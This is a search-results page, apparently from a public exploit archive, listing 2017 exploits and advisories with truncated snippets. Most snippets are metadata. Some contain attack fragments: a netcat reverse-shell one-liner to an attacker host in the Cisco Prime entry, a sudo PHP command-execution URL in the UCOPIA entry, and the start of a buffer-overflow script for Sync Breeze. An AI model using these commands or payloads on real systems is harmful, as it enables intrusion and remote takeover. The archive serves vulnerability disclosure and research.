47904 matches found
Linux Kernel < 4.14.rc3 - Local Denial of Service
/ Exploit Title: Linux Kernelnrfrags was overwritten by ev-iferror = err 0xff in the condition where nlh-nlmsglen==0x10 and skb-len nlh-nlmsglen. POC: / include include include include include define NETLINKUSER 31 define MAXPAYLOAD 1024 / maximum payload size/ struct sockaddrnl srcaddr, destaddr...
Qmail SMTP - Bash Environment Variable Injection (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Qmail SMTP Bash Environment Variable Injection Shellshock', 'Description' = %q This module exploits a shellshock vulnerability on Qmail, a public...
OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection
Title: OpenText Document Sciences xPression formerly EMC Document Sciences xPression - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14757 Affected Software: ================== OpenText Document Sciences xPression formerly EMC Document Sciences xPression Exploit was...
phpCollab 2.5.1 - SQL Injection
CVE-2017-6089 PhpCollab 2.5.1 Multiple SQL Injections unauthenticated Description PhpCollab is an open source web-based project management system, that enables collaboration across the Internet. SQL injections The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code...
phpCollab 2.5.1 - Arbitrary File Upload
CVE-2017-6090 PhpCollab 2.5.1 Arbitrary File Upload unauthenticated Description PhpCollab is an open source web-based project management system, that enables collaboration across the Internet. Arbitrary File Upload The phpCollab code does not correctly filter uploaded file contents. An...
NPM-V (Network Power Manager) 2.4.1 - Password Reset
NPM-VNetwork Power Manager = 2.4.1 Reset Password Vulnerability Author: Saeed reza Zamanian penetrationtest @ Linkedin Product: NPM-V Affected Version : 2.4.1 and below Vendor : http://www.china-clever.com Product Link : http://www.china-clever.com/en/index.php/product?view=products&cid=125 Date:...
Dnsmasq < 2.78 - Lack of free() Denial of Service
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the following option is specified: --add-mac,...
Dnsmasq < 2.78 - Stack Overflow
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open two terminals docker build -t dnsmasq . docker run --rm -t -i...
UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution
Exploit Title: Unauthenticated remote root code execution on captive portal Ucopia '/var/www/html/upload/bd.php;echo%20t As php is in sudoers without password... https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system"id";%27 Just push your ssh key and get nice root...
Dnsmasq < 2.78 - Integer Underflow
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the following option is specified: --add-mac,...
Dnsmasq < 2.78 - Information Leak
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html Sadly, there are no easy docker setup instructions available. Setup a simple network with...
OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection
Title: OpenText Document Sciences xPression formerly EMC Document Sciences xPression - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14758 Affected Software: ================== OpenText Document Sciences xPression formerly EMC Document Sciences xPression Exploit was...
Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow
Exploit Title: SyncBreeze POST username overflow Date: 30-Sep-2017 Exploit Author: Owais Mehtab Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested on: Windows 7 !/usr/bin/python import socket import os...
Microsoft Word 2007 (x86) - Information Disclosure
Title: MS Office Word Information Disclosure Vulnerability Date: September 30th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007 32-bits x86 Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP X86 and x64...
Microsoft Excel - OLE Arbitrary Code Execution
Title: MS Office Excel all versions Arbitrary Code Execution Vulnerability Date: September 30th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007,2010,2013,2016 32/64 bits x86 and x64 Tested on: Windows...
ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download
Exploit Title: ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download Dork: N/A Date: 29.09.2017 Vendor Homepage: https://codecanyon.net/user/lemonadeflirt Software Link: https://codecanyon.net/item/converto-video-downloader-converter/13225966 Demo: http://vd.googglet.com/ Version:...
FileRun < 2017.09.18 - SQL Injection
!/usr/bin/env python Exploit Title: FileRun =2017.09.18 Date: September 29, 2017 Exploit Author: SPARC Vendor Homepage: https://www.filerun.com/ Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t Version: 2017.09.18 Tested on: Ubuntu 16.04.3,...
WordPress Plugin WPHRM - SQL Injection
Exploit Title: WordPress Plugin WPHRM - SQL Injection Dork: N/A Date: 29.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wphrm-human-resource-management-system-for-wordpress/20555857 Demo: http://mobilewebs.net/mojoomla/extend/wordpress/wphrm/ Version: N/A...
Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow
!/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: Dup Scout Enterprise v10.0.18 "Import Command" Buffer Overflow Date: 29-09-2017 Website: www.touhidshaikh.com...
Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan...
Real Estate MLM plan script 1.0 - 'srch' SQL Injection
Exploit Title: Real Estate MLM plan script v1.0 - 'srch' Parameter SQL Injection Date: 2017-09-28 Exploit Author: 8bitsec Vendor Homepage: http://www.mlmscript.in/ Software Link: http://www.mlmscript.in/real-estate-mlm-script.html Version: 1.0 Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email:...
PHP Multi Vendor Script 1.02 - 'sid' SQL Injection
Exploit Title: PHP Multi Vendor Script v1.02 - 'sid' Parameter SQL Injection Date: 2017-09-28 Exploit Author: 8bitsec Vendor Homepage: http://www.dexteritysolution.com/ Software Link: http://www.dexteritysolution.com/php-multivendor-e-commerce-script.html Version: 1.02 Tested on: Kali Linux 2.0 |...
Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan v11.0 and XG...
DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow
!/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: DiskBoss Enterprise v8.4.16 "Import Command" Buffer Overflow Date: 29-09-2017 Website: www.touhidshaikh.com...
Roteador Wireless Intelbras WRN150 - Autentication Bypass
Exploit Title: Autentication Bypass/Config file download - INTELBRAS WRN 150 Date: 28/09/2017 Exploit Author: Elber Tavares Vendor Homepage: http://intelbras.com.br/ Version: Intelbras Wireless N 150 Mbps - WRN 150 Tested on: kali linux, windows 7, 8.1, 10 For more info:...
DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)
!/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer OverflowPoC Date: 28-09-2017 Website: www.touhidshaikh.com Vulnerable...
Easy Blog PHP Script 1.3a - 'id' SQL Injection
Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection Date: 2017-09-27 Exploit Author: 8bitsec Vendor Homepage: https://www.codester.com/ Software Link: https://www.codester.com/items/4616/easy-blog-php-script Version: 1.3a Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email: [email protected]...
Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ========...
Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan...
Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: =========== OfficeScan v11.0 and XG 12.0...
Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan v11.0 and XG 12.0...
Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ===========...
Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com...
Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution
Title: MS Office Groove 'Workspace Shortcut' Arbitrary Code Execution Vulnerability Date: September 28th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007 32-bits x86 Tested on: Windows 7/Server 2008/Vista/Serve...
Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution
Exploit Title: Oracle WebLogic Server Java Deserialization Remote Code Execution Date: 27/09/2017 Exploit Author: SlidingWindow , Twitter: @kapilkhot Vulnerability Author: FoxGloveSecurity Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html Affetcted Version...
LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)
require 'msf/core' class MetasploitModule 'LAquis SCADA Web Server Directory Traversal Information Disclosure', 'Description' = %q This module exploits a directory traversal vulnerability found in the LAquis SCADA application. The vulnerability is triggered when sending a series of dot dot slashe...
Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)
!/usr/bin/python import socket import sys try: server = sys.argv1 port = 80 size = 800 inputBuffer = b"A" size content = b"username=" + inputBuffer + b"&password=A" buffer = b"POST /login HTTP/1.1\r\n" buffer += b"Host: " + server.encode + b"\r\n" buffer += b"User-Agent: Mozilla/5.0 X11; Linux866...
SmarterStats 11.3.6347 - Cross-Site Scripting
---------------------------- Title: CVE-2017-14620 ---------------------------- TL;DR: SmarterStats Version 11.3.6347, and possibly prior versions, will Render the Referer Field of HTTP Logfiles in URL /Data/Reports/ReferringURLsWithQueries ---------------------------- Author: David Hoyt Date:...
Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution
Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...
Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution
Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE Date: 27.09.2017 Software Link: https://www.netgear.com/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: remote 1. Description $GET'uploaddir' is not escaped a...
WordPress Plugin School Management System - SQL Injection
Exploit Title: School Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/school-management-system-for-wordpress/11470032 Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/school/...
AMC Master - Arbitrary File Upload
Exploit Title: Annual Maintenance Contract Management System - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/amc-master-annual-maintenance-contract-management-system/20667703 Demo:...
TicketPlus - Arbitrary File Upload
Exploit Title: TicketPlus - Support Ticket Management System - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/ticketplus-support-ticket-management-system/20221316 Demo: http://sportsgrand.com/demo/ticketplus/...
SMSmaster - SQL Injection
Exploit Title: SMSmaster – Multipurpose SMS Gateway for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/smsmaster-multipurpose-sms-gateway-for-wordpress/20605853 Demo:...
WordPress Plugin WPCHURCH - SQL Injection
Exploit Title: WPCHURCH - Church Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wpchurch-church-management-system-for-wordpress/14292251 Demo:...
Photo Fusion - Arbitrary File Upload
Exploit Title: Photo Fusion - Free Stock Photos Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/photo-fusion-free-stock-photos-script/20115244 Demo: http://teamworktec.com/demo/photos-fusion/ Version: N/...
Job Links - Arbitrary File Upload
Exploit Title: Job Links - Complete Job Management Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/job-links-complete-job-management-script/20672089 Demo: http://teamworktec.com/demo/job-links/ Version:...
WordPress Plugin WPAMS - SQL Injection
Exploit Title: WPAMS - Apartment Management System for wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wpams-apartment-management-system-for-wordpress/15946837 Demo:...
Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation
/ CVE-2017-1000253.c - an exploit for CentOS-7 kernel versions 3.10.0-514.21.2.el7.x8664 and 3.10.0-514.26.1.el7.x8664 Copyright C 2017 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free...
WordPress Plugin WPGYM - SQL Injection
Exploit Title: WPGYM - Wordpress Gym Management System - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/-wpgym-wordpress-gym-management-system/13352964 Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/gym/ Version...